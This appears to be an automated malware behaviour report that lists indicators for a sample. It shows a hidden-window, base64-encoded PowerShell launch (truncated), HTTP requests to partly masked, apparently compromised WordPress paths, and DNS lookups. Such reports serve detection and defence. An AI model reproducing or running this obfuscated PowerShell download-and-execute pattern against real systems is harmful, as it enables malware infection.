Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABRAEIAagBvADYAUgBwAD0AJwBFAGEAZABxAHIAVQAnADsAJABNAEQANgAwADYAZgAgAD0AIAAnADkANgA5ACcAOwAkAGoAYQAyAFoAXwA0AD0AJwBwAHcAQgB1AEUARgA3ACcAOwAkAEMAbwB2AGkARABHAEEAPQAkAGUAbgB2ADoAdQBzAGUAc...
Network activity
TCP
HTTP GET requests
- http://sa###raca.com/wp-admin/aVBdZeOGj/
- http://www.pa#####bentivoglio.org/softaculous/ZLXVNXrCC/
- http://ai###ory.com/wp-admin/gxNAbyQwxr/
UDP
- DNS ASK ev######ngtobetrendy.com
- DNS ASK sa###raca.com
- DNS ASK pa#####bentivoglio.org
- DNS ASK ai###ory.com
- DNS ASK an#####usassists.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -e JABRAEIAagBvADYAUgBwAD0AJwBFAGEAZABxAHIAVQAnADsAJABNAEQANgAwADYAZgAgAD0AIAAnADkANgA5ACcAOwAkAGoAYQAyAFoAXwA0AD0AJwBwAHcAQgB1AEUARgA3ACcAOwAkAEMAbwB2AGkARABHAEEAPQAkAGUAbgB2ADoAdQBzAGUAc...' (with hidden window)
